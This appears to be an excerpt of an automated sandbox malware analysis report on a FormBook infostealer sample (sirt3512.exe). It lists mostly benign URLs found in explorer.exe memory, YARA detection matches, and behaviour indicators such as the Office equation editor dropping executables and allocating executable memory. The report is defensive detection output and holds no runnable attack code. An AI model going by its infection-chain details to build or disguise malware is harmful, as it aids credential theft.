Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2105636613.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2120160789.00000000002BB000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000000.2097589761.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp&
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehps
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2102484793.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2120123904.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\sirt3512.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\control.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\control.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A060 NtClose, 5_2_0041A060
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A110 NtAllocateVirtualMemory, 5_2_0041A110
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00419F30 NtCreateFile, 5_2_00419F30
